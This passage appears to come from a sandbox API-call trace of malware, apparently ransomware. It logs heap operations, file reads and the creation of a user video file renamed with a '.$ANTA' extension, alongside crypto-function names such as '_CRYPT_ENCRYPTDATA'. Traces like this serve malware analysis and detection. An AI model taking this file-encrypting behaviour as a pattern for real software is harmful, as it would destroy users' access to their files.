Flags=0x0, Size=0x4) returned 0x43e29d0 [0107.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0107.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29f0 [0107.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xb0) returned 0x42d9e48 [0107.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5360 [0107.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a49d0 [0107.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2910 [0107.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5360 [0107.836] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\tr4gQM\\" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\t h0jeo_wwrx\\tr4gqm")) returned 0x10 [0107.837] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5360 | out: hHeap=0x1780000) returned 1 [0107.837] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0107.837] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a49d0 | out: hHeap=0x1780000) returned 1 [0107.837] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0107.837] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0107.837] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0107.837] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41abfc0 [0107.837] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x4506008 [0107.837] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0107.837] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0107.837] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\tr4gQM\\Cu3r8FST64g6XD.flv.$ANTA" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\t h0jeo_wwrx\\tr4gqm\\cu3r8fst64g6xd.flv.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0107.839] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0058 [0107.839] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0107.839] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0107.839] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0107.839] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0107.839] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0107.839] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdd8 | out: hHeap=0x1780000) returned 1 [0107.839] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0107.839] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0107.839] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0107.839] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0107.839] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0107.839] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f48 [0107.839] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0107.839] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f48 | out: hHeap=0x1780000) returned 1 [0107.839] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0107.839] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0107.839] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac000 [0107.839] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0107.839] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac000 | out: hHeap=0x1780000) returned 1 [0107.839] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0107.839] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac000 [0107.840] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0107.840] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0107.840] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00a8 [0107.840] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0107.840] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0107.840] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0107.840] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0107.840] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0107.840] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0107.840] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e08 [0107.840] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e08 | out: hHeap=0x1780000) returned 1 [0107.840] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0107.840] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0107.840] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0107.840] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0107.840] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2910 [0107.840] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e0d020 [0107.843] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144e7f8 | out: lpNewFilePointer=0x0) returned 1 [0107.844] ReadFile (in: hFile=0x258, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144e820, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144e820*=0x10000, lpOverlapped=0x0) returned 1 [0107.845] ReadFile (in: hFile=0x258, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144e820, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144e820*=0x3a0, lpOverlapped=0x0) returned 1 [0107.845] ReadFile (in: hFile=0x258, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144e820, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144e820*=0x0, lpOverlapped=0x0) returned 1 [0107.845] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0107.845] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0107.845] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0107.846] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0107.846] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x103a0) returned 0x4516010 [0107.846] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e0d020 | out: hHeap=0x1780000) returned 1 [0107.848] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0107.848] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0107.849] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00a8 | out: hHeap=0x1780000) returned 1 [0107.849] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0107.849] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0107.849] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x103a0) returned 0x45263b8 [0107.849] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0107.849] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0107.849] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0107.849] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0107.849] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfea0 [0107.849] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0107.849] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0107.849] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0107.849] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x103a0) returned 0x4516010 [0107.849] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0107.849] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0107.849] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0107.849] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0107.849] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfea0 | out: hHeap=0x1780000) returned 1 [0107.849] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0107.849] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0107.849] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0107.849] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0107.849] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0107.849] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0107.849] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0107.849] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0107.849] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac140 [0107.850] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0107.850] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0107.850] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0107.850] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b28 [0107.850] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0107.850] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b28 | out: hHeap=0x1780000) returned 1 [0107.850] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0107.850] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0120 [0107.850] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2760 [0107.850] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdd8 [0107.850] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0107.850] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0107.850] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29a0 [0107.850] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x103a0) returned 0x4516010 [0107.850] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0107.850] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2770 [0107.850] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0107.850] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29b0 [0107.850] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0107.850] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2ad0 [0107.850] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0107.850] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a60 [0107.850] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0107.850] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e29c0 [0107.850] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0107.850] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b00 [0107.851] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0107.851] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca7d8 [0107.851] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0170 [0107.851] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0107.851] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a30 [0107.851] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0107.851] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a90 [0107.851] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x103a0) returned 0x4536760 [0107.851] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00f8 [0107.851] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0107.851] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29d0 [0107.851] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0107.851] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0198 [0107.851] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0107.851] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01c0 [0107.851] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0107.851] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29b0 [0107.851] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0107.851] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff68 [0107.851] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0107.851] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a50 [0107.851] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0107.851] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0107.851] PeekMessageW (in: lpMsg=0x144e6a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e6a4) returned 0 [0107.851] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2aa0 [0107.851] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0107.852] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a20 [0107.852] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0107.852] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac040 [0107.852] PeekMessageW (in: lpMsg=0x144e6a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e6a4) returned 0 [0107.852] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff18 [0107.852] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0107.852] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29e0 [0107.852] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0107.852] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00a8 [0107.852] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0107.852] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0107.852] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29f0 [0107.852] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0107.852] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a00 [0107.852] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0107.852] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0107.852] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0107.852] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0107.852] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe00 [0107.852] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2a00 [0107.852] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00d0 [0107.852] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0107.852] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a60 [0107.853] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0107.853] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca940 [0107.853] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfec8 [0107.853] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0107.853] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a20 [0107.853] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0107.853] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01e8 [0107.853] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0107.853] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0107.853] PeekMessageW (in: lpMsg=0x144e18c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e18c) returned 0 [0107.853] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0008 [0107.853] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0107.853] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2980 [0107.853] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0107.853] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0107.853] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ae0 [0107.853] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0107.853] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0210 [0107.853] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0107.853] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a40 [0107.853] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0107.853] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0107.853] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796de8 [0107.853] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a10 [0107.853] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0107.854] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0107.854] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2ae8 [0107.854] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0107.854] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a40 [0107.854] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0107.854] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b00 [0107.854] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0107.854] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a60 [0107.854] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0107.854] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a70 [0107.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0107.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0107.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0107.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0107.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0107.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0107.854] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ac0 [0107.854] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a60 [0107.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0107.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0107.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0107.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0107.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0210 | out: hHeap=0x1780000) returned 1 [0107.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0107.854] PeekMessageW (in: lpMsg=0x144e18c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e18c) returned 0 [0107.854] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff90 [0107.854] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0107.854] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a10 [0107.854] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0107.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0107.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b10 [0107.855] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0107.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0210 [0107.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0107.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b00 [0107.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a70 [0107.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391d58 